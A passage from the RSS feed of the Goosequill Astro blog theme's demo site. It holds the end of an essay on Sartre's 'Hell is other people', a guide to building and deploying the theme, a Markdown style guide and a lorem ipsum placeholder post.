Finally, &lt;font color=&quot;#ffc000&quot;&gt;if we cannot properly regard ourselves, we ourselves can also become our own hell.&lt;/font&gt; I&apos;ll leave this as an open question for you to ponder: why might one become one&apos;s own hell?

In short, the conclusion is this: whether others become our hell depends largely on our own mindset. If we offer sincerity, &lt;font color=&quot;#0070c0&quot;&gt;if we care less about the gaze of others, and if we can just be ourselves — with this shift in thought, we will find ourselves no longer in hell, but in heaven.&lt;/font&gt;

### Usage Analysis

**Applicable Themes:** The relationship between self and others, properly handling others&apos; evaluations, being oneself, etc.

**Example:**
&gt; People always come to know themselves and affirm their existence through the gaze of others. Yet, the more we do this, the more we feel that the gaze of others is an eternal, inescapable presence. At this point, we begin to suffer a spiritual torment under that gaze: Did I do something wrong? Could I have done better? What should I do to get it right?
&gt; &lt;font color=&quot;#00b050&quot;&gt;Sartre encapsulated this psychological scenario in the phrase &quot;Hell is other people.&quot;&lt;/font&gt; Many people in this world, including you and me, are more or less experiencing this painful situation. It is precisely because we care too much about the gaze of others, and desire too strongly to establish a perfect self in their eyes, that we are driven to constantly judge ourselves according to others&apos; standards and &quot;revise&quot; ourselves repeatedly. &lt;font color=&quot;#e36c09&quot;&gt;Little do we realize that with each revision, we become utterly unrecognizable, and under the gaze of others, we perpetually cycle through our own journey through hell.&lt;/font&gt;</content:encoded></item><item><title>How to Deploy This Astro Theme</title><link>https://goosequill.erina.top/en/blog/deploying-goosequill-theme/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/deploying-goosequill-theme/</guid><description>A practical guide to taking the Goosequill theme from local development to production deployment.</description><pubDate>Fri, 07 Mar 2025 16:00:00 GMT</pubDate><content:encoded>## 1. Prepare your environment

This theme is built with Astro, so you should have these tools ready:

- Node.js 20+
- npm
- Git

After cloning the project, install dependencies:

```bash
git clone git@github.com:ErinaYip/goosequill.git
cd goosequill
npm install
```

Start local development with:

```bash
npm run dev
```

Create a production build with:

```bash
npm run build
```

This project does more than run `astro build`: it also runs Pagefind to generate search indexes. Because of that, `npm run build` is the best pre-deployment check.

## 2. Update the most important configuration first

Before deploying, review these files first.

### `astro.config.mjs`

The two most important fields here are `site` and `base`:

- `site`: your production URL, such as `https://blog.example.com`
- `base`: required if the site is deployed under a subpath, such as `https://example.com/blog/`

For a root-domain deployment, a typical setup looks like this:

```js
site: &apos;https://blog.example.com&apos;,
base: &apos;/&apos;,
```

### `src/config.ts`

This file controls the site title, description, RSS, search, table of contents, and pagination behavior.

At minimum, review these fields:

- `title`
- `description`
- `defaultLocale`
- `rss.enable`
- `search.enable`
- `pagination.posts_per_page`

For single-language mode:

```ts
defaultLocale: &apos;en&apos;
```

For multi-language mode:

```ts
defaultLocale: undefined
```

In this theme, routing works like this:

- Single-language mode uses unprefixed routes such as `/about` and `/blog/post`
- Multi-language mode uses locale-prefixed routes such as `/en/about` and `/zh-cn/blog/post`
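
The routing rule above can be sketched as a small helper. This is only an illustration under the assumption that the mode is decided solely by `defaultLocale`; `routeFor` and its parameters are hypothetical names, not part of the theme.

```ts
// Hypothetical helper illustrating the routing rule; not the theme's own code.
// defaultLocale set       : single-language mode, unprefixed routes
// defaultLocale undefined : multi-language mode, locale-prefixed routes
function routeFor(
  defaultLocale: string | undefined,
  locale: string,
  path: string,
): string {
  // Normalize the path so it starts with exactly one slash.
  const clean = `/` + path.replace(/^\/+/, ``);
  if (defaultLocale !== undefined) {
    return clean;
  }
  return `/${locale}${clean}`;
}
```

With `defaultLocale` set to `en`, the path `/about` stays `/about`. With `defaultLocale` undefined and the locale `zh-cn`, the path `blog/post` becomes `/zh-cn/blog/post`.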

## 3. Organize your content correctly

Blog posts live under `src/content/blog/`, with one directory per post.

For example:

```text
src/content/blog/my-post/
  index_en.mdx
  index_zh-cn.mdx
```

A practical recommendation:

- For a single-language site, keep at least the file for your default locale
- For a multilingual site, create one `index_&lt;locale&gt;.mdx` file per locale
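
As a rough sketch of this naming convention, the helper below lists the files a post would be expected to have for a given set of locales. The function name `expectedPostFiles` is hypothetical, and the path layout is taken from the example above.

```ts
// Hypothetical helper: lists the content files one post is expected to have.
// The directory layout mirrors the example above; the name is illustrative.
function expectedPostFiles(slug: string, locales: string[]): string[] {
  const files: string[] = [];
  for (const locale of locales) {
    // One file per locale, named index_ plus the locale code.
    files.push(`src/content/blog/${slug}/index_${locale}.mdx`);
  }
  return files;
}
```

For the slug `my-post` and the locales `en` and `zh-cn`, this yields `src/content/blog/my-post/index_en.mdx` and `src/content/blog/my-post/index_zh-cn.mdx`. A list like this can be handy when checking that no locale file is missing.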

If you only publish in English, the simplest setup is to keep English files and set:

```ts
defaultLocale: &apos;en&apos;
```

## 4. Validate the production build locally

Before going live, run:

```bash
npm run build
npm run preview
```

`npm run preview` serves the production output locally, which is much closer to the real deployed environment than development mode.

Check these pages and features carefully:

- Home page, blog index, and blog post pages
- Image loading
- RSS feed accessibility
- Search behavior
- Language switcher links
- `sitemap-index.xml` generation

## 5. Easiest deployment targets: Vercel / Netlify / Cloudflare Pages

Because this is a static site, it works well on most static hosting providers.

### Option A: Vercel

When importing the repo into Vercel, you can usually use:

- Build Command: `npm run build`
- Output Directory: `dist`

### Option B: Netlify

Typical Netlify settings:

- Build command: `npm run build`
- Publish directory: `dist`

### Option C: Cloudflare Pages

Typical Cloudflare Pages settings:

- Build command: `npm run build`
- Build output directory: `dist`

## 6. What to watch for on GitHub Pages

If you deploy to GitHub Pages, `base` is usually the most important setting.

If your site is published at:

```text
https://&lt;user&gt;.github.io/goosequill/
```

then you will typically want:

```js
base: &apos;/goosequill&apos;
```

You should also update `site` to match the final public URL.

If `base` is wrong, common symptoms include:

- CSS returning 404
- JavaScript returning 404
- images not loading
- broken internal links
- search assets failing to load
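
To see why a wrong `base` produces these 404s, it helps to look at how a base path prefixes site-relative URLs. The helper below is a minimal sketch of that idea; `withBase` is a hypothetical name, not an Astro or Goosequill API, and the asset path in the note is made up for illustration.

```ts
// Hypothetical helper showing how a base path prefixes site-relative URLs.
function withBase(base: string, path: string): string {
  // Trim trailing slashes from the base and leading slashes from the path,
  // then join the two parts with a single slash.
  const trimmedBase = base.replace(/\/+$/, ``);
  const trimmedPath = path.replace(/^\/+/, ``);
  return `${trimmedBase}/${trimmedPath}`;
}
```

With `base` set to `/goosequill`, the asset `styles/main.css` resolves to `/goosequill/styles/main.css`. With `base` left at `/`, the same asset resolves to `/styles/main.css`, which does not exist on a site served from `/goosequill/`.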

## 7. Final checks before connecting a custom domain

Before switching to your real domain, verify that:

- `site` in `astro.config.mjs` matches the real domain
- `base` matches the actual deployment path
- RSS is accessible
- sitemap output matches the site URL
- social share metadata renders correctly

If RSS and sitemap are enabled while `site` still points to a placeholder domain, the generated absolute URLs will be wrong.
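
A minimal sketch of the effect, assuming absolute links are produced by resolving a path against `site` with the standard `URL` constructor. The function name `absoluteUrl` is hypothetical.

```ts
// Hypothetical illustration: absolute links are derived from the site value.
function absoluteUrl(site: string, path: string): string {
  // The standard URL constructor resolves the path against the site origin.
  return new URL(path, site).href;
}
```

With `site` set to `https://blog.example.com`, the path `/rss.xml` becomes `https://blog.example.com/rss.xml`. If `site` is still a placeholder, every link generated this way carries the placeholder domain.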

## 8. Common problems

### The build succeeds, but styles are missing

Check these first:

- whether `base` is correct
- whether your assets use the correct paths
- whether your platform actually published the `dist/` directory

### Search opens but returns no results

This theme uses Pagefind, so search depends on the generated index files. Confirm that:

- you deployed the output from `npm run build`
- `dist/pagefind/` was published together with the rest of the site

### Multilingual pages return 404

Check these first:

- whether `defaultLocale` in `src/config.ts` matches your intended mode
- whether page and post files use the expected locale suffixes
- whether the matching content files actually exist for the current locale

## 9. A simple recommended deployment workflow

If you want a reliable workflow, use this one:

1. Fork or clone the project
2. Update `site` and `base` in `astro.config.mjs`
3. Update the site title, description, and language mode in `src/config.ts`
4. Add your own content
5. Run `npm run build`
6. Run `npm run preview`
7. Push to your Git repository
8. Connect the repository to Vercel, Netlify, or Cloudflare Pages
9. After deployment, verify RSS, sitemap, and search

## Summary

Deploying this theme is not complicated. In practice, it comes down to three things:

- configure `site` and `base` correctly
- make sure the language mode in `src/config.ts` matches your content files
- always validate with `npm run build`

If those three parts are correct, deployment on most static hosting providers should be smooth.

Useful follow-ups to this post would be dedicated sections on:

- deploying to GitHub Pages
- configuring a custom domain
- adding comments or analytics</content:encoded></item><item><title>Markdown Style Guide</title><link>https://goosequill.erina.top/en/blog/markdown-style-guide/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/markdown-style-guide/</guid><description>Here is a sample of some basic Markdown syntax that can be used when writing Markdown content in Astro.</description><pubDate>Tue, 18 Jun 2024 16:00:00 GMT</pubDate><content:encoded>Here is a sample of some basic Markdown syntax that can be used when writing Markdown content in Astro.

## Headings

The following HTML `&lt;h1&gt;`—`&lt;h6&gt;` elements represent six levels of section headings. `&lt;h1&gt;` is the highest section level while `&lt;h6&gt;` is the lowest.

# H1

## H2

### H3

#### H4

##### H5

###### H6

## Paragraph

Xerum, quo qui aut unt expliquam qui dolut labo. Aque venitatiusda cum, voluptionse latur sitiae dolessi aut parist aut dollo enim qui voluptate ma dolestendit peritin re plis aut quas inctum laceat est volestemque commosa as cus endigna tectur, offic to cor sequas etum rerum idem sintibus eiur? Quianimin porecus evelectur, cum que nis nust voloribus ratem aut omnimi, sitatur? Quiatem. Nam, omnis sum am facea corem alique molestrunt et eos evelece arcillit ut aut eos eos nus, sin conecerem erum fuga. Ri oditatquam, ad quibus unda veliamenimin cusam et facea ipsamus es exerum sitate dolores editium rerore eost, temped molorro ratiae volorro te reribus dolorer sperchicium faceata tiustia prat.

Itatur? Quiatae cullecum rem ent aut odis in re eossequodi nonsequ idebis ne sapicia is sinveli squiatum, core et que aut hariosam ex eat.

## Images

### Syntax

```markdown
![Alt text](./full/or/relative/path/of/image)
```

### Output

![blog placeholder](blog-placeholder-about.jpg)

## Blockquotes

The blockquote element represents content that is quoted from another source, optionally with a citation which must be within a `footer` or `cite` element, and optionally with in-line changes such as annotations and abbreviations.

### Blockquote without attribution

#### Syntax

```markdown
&gt; Tiam, ad mint andaepu dandae nostion secatur sequo quae.  
&gt; **Note** that you can use _Markdown syntax_ within a blockquote.
```

#### Output

&gt; Tiam, ad mint andaepu dandae nostion secatur sequo quae.  
&gt; **Note** that you can use _Markdown syntax_ within a blockquote.

### Blockquote with attribution

#### Syntax

```markdown
&gt; Don&apos;t communicate by sharing memory, share memory by communicating.
&gt; — &lt;cite&gt;Rob Pike[^1]&lt;/cite&gt;
```

#### Output

&gt; Don&apos;t communicate by sharing memory, share memory by communicating.
&gt; — &lt;cite&gt;Rob Pike[^1]&lt;/cite&gt;

[^1]: The above quote is excerpted from Rob Pike&apos;s [talk](https://www.youtube.com/watch?v=PAAkCSZUG1c) during Gopherfest, November 18, 2015.

## Tables

### Syntax

```markdown
| Italics   | Bold     | Code   |
| --------- | -------- | ------ |
| _italics_ | **bold** | `code` |
```

### Output

| Italics   | Bold     | Code   |
| --------- | -------- | ------ |
| _italics_ | **bold** | `code` |

## Code Blocks

### Syntax

Open a code block with three backticks on a new line, write the snippet, and close it with three backticks on their own line. To enable language-specific syntax highlighting, add the language name right after the opening backticks, e.g. html, javascript, css, markdown, typescript, txt, or bash.

````markdown
```html
&lt;!doctype html&gt;
&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;meta charset=&quot;utf-8&quot; /&gt;
    &lt;title&gt;Example HTML5 Document&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;p&gt;Test&lt;/p&gt;
  &lt;/body&gt;
&lt;/html&gt;
```
````

### Output

```html
&lt;!doctype html&gt;
&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;meta charset=&quot;utf-8&quot; /&gt;
    &lt;title&gt;Example HTML5 Document&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;p&gt;Test&lt;/p&gt;
  &lt;/body&gt;
&lt;/html&gt;
```


## Mermaid Diagrams

### Syntax

````markdown
```mermaid
flowchart TD
  A[Write Markdown] --&gt; B[Render Mermaid]
  B --&gt; C[Display Diagram]
```
````

### Output

```mermaid
flowchart TD
  A[Write Markdown] --&gt; B[Render Mermaid]
  B --&gt; C[Display Diagram]
```

## List Types

### Ordered List

#### Syntax

```markdown
1. First item
2. Second item
3. Third item
```

#### Output

1. First item
2. Second item
3. Third item

### Unordered List

#### Syntax

```markdown
- List item
- Another item
- And another item
```

#### Output

- List item
- Another item
- And another item

### Nested list

#### Syntax

```markdown
- Fruit
  - Apple
  - Orange
  - Banana
- Dairy
  - Milk
  - Cheese
```

#### Output

- Fruit
  - Apple
  - Orange
  - Banana
- Dairy
  - Milk
  - Cheese

## Other Elements — abbr, sub, sup, kbd, mark

### Syntax

```markdown
&lt;abbr title=&quot;Graphics Interchange Format&quot;&gt;GIF&lt;/abbr&gt; is a bitmap image format.

H&lt;sub&gt;2&lt;/sub&gt;O

X&lt;sup&gt;n&lt;/sup&gt; + Y&lt;sup&gt;n&lt;/sup&gt; = Z&lt;sup&gt;n&lt;/sup&gt;

Press &lt;kbd&gt;CTRL&lt;/kbd&gt; + &lt;kbd&gt;ALT&lt;/kbd&gt; + &lt;kbd&gt;Delete&lt;/kbd&gt; to end the session.

Most &lt;mark&gt;salamanders&lt;/mark&gt; are nocturnal, and hunt for insects, worms, and other small creatures.
```

### Output

&lt;abbr title=&quot;Graphics Interchange Format&quot;&gt;GIF&lt;/abbr&gt; is a bitmap image format.

H&lt;sub&gt;2&lt;/sub&gt;O

X&lt;sup&gt;n&lt;/sup&gt; + Y&lt;sup&gt;n&lt;/sup&gt; = Z&lt;sup&gt;n&lt;/sup&gt;

Press &lt;kbd&gt;CTRL&lt;/kbd&gt; + &lt;kbd&gt;ALT&lt;/kbd&gt; + &lt;kbd&gt;Delete&lt;/kbd&gt; to end the session.

Most &lt;mark&gt;salamanders&lt;/mark&gt; are nocturnal, and hunt for insects, worms, and other small creatures.</content:encoded></item><item><title>Third post</title><link>https://goosequill.erina.top/en/blog/third-post/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/third-post/</guid><description>Lorem ipsum dolor sit amet</description><pubDate>Thu, 21 Jul 2022 16:00:00 GMT</pubDate><content:encoded>## Lorem

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Vitae ultricies leo integer malesuada nunc vel risus commodo viverra. Adipiscing enim eu turpis egestas pretium. Euismod elementum nisi quis eleifend quam adipiscing. In hac habitasse platea dictumst vestibulum. Sagittis purus sit amet volutpat. Netus et malesuada fames ac turpis egestas. Eget magna fermentum iaculis eu non diam phasellus vestibulum lorem. Varius sit amet mattis vulputate enim. Habitasse platea dictumst quisque sagittis. Integer quis auctor elit sed vulputate mi. Dictumst quisque sagittis purus sit amet.

### Morbi

Morbi tristique senectus et netus. Id semper risus in hendrerit gravida rutrum quisque non tellus. Habitasse platea dictumst quisque sagittis purus sit amet. Tellus molestie nunc non blandit massa. Cursus vitae congue mauris rhoncus. Accumsan tortor posuere ac ut. Fringilla urna porttitor rhoncus dolor. Elit ullamcorper dignissim cras tincidunt lobortis. In cursus turpis massa tincidunt dui ut ornare lectus. Integer feugiat scelerisque varius morbi enim nunc. Bibendum neque egestas congue quisque egestas diam. Cras ornare arcu dui vivamus arcu felis bibendum. Dignissim suspendisse in est ante in nibh mauris. Sed tempus urna et pharetra pharetra massa massa ultricies mi.

## Ipsum

Morbi tristique senectus et netus. Id semper risus in hendrerit gravida rutrum quisque non tellus. Habitasse platea dictumst quisque sagittis purus sit amet. Tellus molestie nunc non blandit massa. Cursus vitae congue mauris rhoncus. Accumsan tortor posuere ac ut. Fringilla urna porttitor rhoncus dolor. Elit ullamcorper dignissim cras tincidunt lobortis. In cursus turpis massa tincidunt dui ut ornare lectus. Integer feugiat scelerisque varius morbi enim nunc. Bibendum neque egestas congue quisque egestas diam. Cras ornare arcu dui vivamus arcu felis bibendum. Dignissim suspendisse in est ante in nibh mauris. Sed tempus urna et pharetra pharetra massa massa ultricies mi.

### Tristique

Mollis nunc sed id semper risus in. Convallis a cras semper auctor neque. Diam sit amet nisl suscipit. Lacus viverra vitae congue eu consequat ac felis donec. Egestas integer eget aliquet nibh praesent tristique magna sit amet. Eget magna fermentum iaculis eu non diam. In vitae turpis massa sed elementum. Tristique et egestas quis ipsum suspendisse ultrices. Eget lorem dolor sed viverra ipsum. Vel turpis nunc eget lorem dolor sed viverra. Posuere ac ut consequat semper viverra nam. Laoreet suspendisse interdum consectetur libero id faucibus. Diam phasellus vestibulum lorem sed risus ultricies tristique. Rhoncus dolor purus non enim praesent elementum facilisis. Ultrices tincidunt arcu non sodales neque. Tempus egestas sed sed risus pretium quam vulputate. Viverra suspendisse potenti nullam ac tortor vitae purus faucibus ornare. Fringilla urna porttitor rhoncus dolor purus non. Amet dictum sit amet justo donec enim.

## Dolor

Mollis nunc sed id semper risus in. Convallis a cras semper auctor neque. Diam sit amet nisl suscipit. Lacus viverra vitae congue eu consequat ac felis donec. Egestas integer eget aliquet nibh praesent tristique magna sit amet. Eget magna fermentum iaculis eu non diam. In vitae turpis massa sed elementum. Tristique et egestas quis ipsum suspendisse ultrices. Eget lorem dolor sed viverra ipsum. Vel turpis nunc eget lorem dolor sed viverra. Posuere ac ut consequat semper viverra nam. Laoreet suspendisse interdum consectetur libero id faucibus. Diam phasellus vestibulum lorem sed risus ultricies tristique. Rhoncus dolor purus non enim praesent elementum facilisis. Ultrices tincidunt arcu non sodales neque. Tempus egestas sed sed risus pretium quam vulputate. Viverra suspendisse potenti nullam ac tortor vitae purus faucibus ornare. Fringilla urna porttitor rhoncus dolor purus non. Amet dictum sit amet justo donec enim.

### Senectus

Mattis ullamcorper velit sed ullamcorper morbi tincidunt. Tortor posuere ac ut consequat semper viverra. Tellus mauris a diam maecenas sed enim ut sem viverra. Venenatis urna cursus eget nunc scelerisque viverra mauris in. Arcu ac tortor dignissim convallis aenean et tortor at. Curabitur gravida arcu ac tortor dignissim convallis aenean et tortor. Egestas tellus rutrum tellus pellentesque eu. Fusce ut placerat orci nulla pellentesque dignissim enim sit amet. Ut enim blandit volutpat maecenas volutpat blandit aliquam etiam. Id donec ultrices tincidunt arcu. Id cursus metus aliquam eleifend mi.

## Sit

Mattis ullamcorper velit sed ullamcorper morbi tincidunt. Tortor posuere ac ut consequat semper viverra. Tellus mauris a diam maecenas sed enim ut sem viverra. Venenatis urna cursus eget nunc scelerisque viverra mauris in. Arcu ac tortor dignissim convallis aenean et tortor at. Curabitur gravida arcu ac tortor dignissim convallis aenean et tortor. Egestas tellus rutrum tellus pellentesque eu. Fusce ut placerat orci nulla pellentesque dignissim enim sit amet. Ut enim blandit volutpat maecenas volutpat blandit aliquam etiam. Id donec ultrices tincidunt arcu. Id cursus metus aliquam eleifend mi.

## Amet

Tempus quam pellentesque nec nam aliquam sem. Risus at ultrices mi tempus imperdiet. Id porta nibh venenatis cras sed felis eget velit. Ipsum a arcu cursus vitae. Facilisis magna etiam tempor orci eu lobortis elementum. Tincidunt dui ut ornare lectus sit. Quisque non tellus orci ac. Blandit libero volutpat sed cras. Nec tincidunt praesent semper feugiat nibh sed pulvinar proin gravida. Egestas integer eget aliquet nibh praesent tristique magna.</content:encoded></item></channel></rss>